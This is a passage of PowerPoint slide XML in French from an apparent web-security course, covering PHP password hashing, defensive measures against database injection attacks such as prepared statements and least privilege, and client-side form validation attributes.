            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="fr-FR" sz="2400" b="0" i="0" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Ex: En PHP, les fonctions </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2400" b="1" i="0" u="sng" strike="noStrike" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FFC000"/>
                </a:solidFill>
                <a:effectLst/>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password</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2400" b="1" i="0" u="sng" strike="noStrike" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FFC000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>_xyz</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2400" b="1" i="0" u="sng" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFC000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2400" b="0" i="0" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>fournissent une bonne façon de </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2400" b="0" i="0" dirty="0" err="1">
                <a:effectLst/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>hasher</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2400" b="0" i="0" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> les données sensibles.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="fr-FR" sz="2400" b="0" i="0" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>La fonction </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2400" b="1" i="0" u="sng" strike="noStrike" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FFC000"/>
                </a:solidFill>
                <a:effectLst/>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password_hash</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2400" b="1" i="0" u="sng" strike="noStrike" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFC000"/>
                </a:solidFill>
                <a:effectLst/>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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2400" b="1" i="0" u="sng" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFC000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2400" b="0" i="0" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>est utilisée pour hacher une chaîne donnée en utilisant l'algorithme cryptographique le plus fort actuellement disponible et la fonction </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2400" b="1" i="0" u="sng" strike="noStrike" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FFC000"/>
                </a:solidFill>
                <a:effectLst/>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password_verify</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2400" b="1" i="0" u="sng" strike="noStrike" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFC000"/>
                </a:solidFill>
                <a:effectLst/>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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2400" b="1" i="0" u="sng" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFC000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2400" b="0" i="0" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>vérifie si le mot de passe fourni correspond au hash stocké en base de données.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="fr-FR" b="0" i="0" dirty="0">
              <a:solidFill>
                <a:srgbClr val="333333"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="Fira Sans" panose="020B0503050000020004" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="29957365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7642019-2D73-45D8-8F15-974B8C29FC2B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="684212" y="685800"/>
            <a:ext cx="8001000" cy="842750"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>Attaque de la bd</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="ZoneTexte 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DA2B4773-A9DA-48A2-9239-B61A3A226C4A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="684212" y="2017216"/>
            <a:ext cx="10555288" cy="3416320"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="bg2">
              <a:lumMod val="75000"/>
              <a:alpha val="50000"/>
            </a:schemeClr>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="2400" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Mettre</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2400" b="0" i="0" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> entre guillemets toutes les valeurs non numériques qui sont passées à la base de données</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="2400" b="0" i="0" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Ne jamais afficher d'informations spécifiques à la base, et notamment des informations concernant le schéma (erreurs de traitement)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="2400" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>F</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2400" b="0" i="0" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>iltrer les données rentrées dans l’application (nettoyage des données)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="2400" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>M</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2400" b="0" i="0" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>ettre en place une liste blanche (whitelist) des caractères acceptés.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="2400" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>A</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2400" b="0" i="0" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>ppliquer une politique de </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2400" b="0" i="0">
                <a:effectLst/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>moindre privilège</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" sz="2400" b="0" i="0" dirty="0">
              <a:effectLst/>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fr-FR" sz="2400" b="0" i="0" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Utilisez des requêtes préparées avec des variables liées</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="2400" b="0" i="0" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Vérifiez que les données ont bien le type attendu</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="16332794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7642019-2D73-45D8-8F15-974B8C29FC2B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="684212" y="685800"/>
            <a:ext cx="8001000" cy="842750"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>Les formulaires</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="ZoneTexte 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{75F3AAFE-19D7-4E24-B9A3-8A4C205909DB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2433649" y="1797784"/>
            <a:ext cx="7324702" cy="1631216"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent5">
              <a:lumMod val="75000"/>
              <a:alpha val="50000"/>
            </a:schemeClr>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="95000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Il faut faire la différence entre deux types d’utilisateurs qui vont être gérés de façons différentes : </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" b="1" i="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="95000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>les utilisateurs maladroits</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="95000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> qui vont envoyer des données invalides par mégarde et les </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" b="1" i="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="95000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>utilisateurs malveillants </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="95000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>qui vont tenter d’exploiter des failles de sécurité dans </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="95000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>le</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="95000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>s formulaires.</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" sz="2000" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1">
                  <a:lumMod val="95000"/>
                </a:schemeClr>
              </a:solidFill>
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="ZoneTexte 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D5073E35-9376-4618-B8C9-CAF7B6187474}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="684212" y="3852121"/>
            <a:ext cx="5221291" cy="1938992"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent5">
              <a:lumMod val="75000"/>
              <a:alpha val="75000"/>
            </a:schemeClr>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="95000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Pour les </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" b="1" i="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="95000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>maladroits</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="95000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>, la méthode va être d’ajouter des contraintes directement dans le formulaire pour limiter les données qui vont être envoyées, comme l’emploi des attributs min, max, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" b="0" i="0" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="95000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>required</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="95000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>, ainsi que la vérification des bons types d’input.</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" sz="2000" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1">
                  <a:lumMod val="95000"/>
                </a:schemeClr>
              </a:solidFill>
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="ZoneTexte 12">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7EE099D9-D69A-4420-B3CF-2C4ED0F0EC0F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6096000" y="3698233"/>
            <a:ext cx="5221291" cy="2246769"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent5">
              <a:lumMod val="75000"/>
            </a:schemeClr>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="95000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Nous allons ensuite également pouvoir tester que les données nous conviennent dès le remplissage d’un champ.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="fr-FR" sz="2000" b="0" i="0" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1">
                  <a:lumMod val="95000"/>
                </a:schemeClr>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" b="1" i="0" u="sng" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="95000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>L’objectif va être ici de bloquer l’envoi du formulaire si certains champs ne sont pas correctement remplis</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" sz="2000" b="1" u="sng" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1">
                  <a:lumMod val="9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633378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7642019-2D73-45D8-8F15-974B8C29FC2B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="684212" y="359225"/>
            <a:ext cx="8001000" cy="842750"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>Les formulaires</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="3" name="Tableau 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{598FD992-6B35-4E37-B061-714622DC4442}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3810907980"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="805543" y="1130673"/>
          <a:ext cx="10572206" cy="5496560"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr firstRow="1" bandRow="1">
                <a:tableStyleId>{5C22544A-7EE6-4342-B048-85BDC9FD1C3A}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="2695516">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="1952163578"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="7876690">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="4031010614"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
              </a:tblGrid>
              <a:tr h="370840">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="fr-FR" dirty="0"/>
                        <a:t>Attribut</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="fr-FR" dirty="0"/>
                        <a:t>Définition</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="2826781398"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="370840">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="fr-FR" dirty="0"/>
                        <a:t>Size</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r-FR" dirty="0"/>
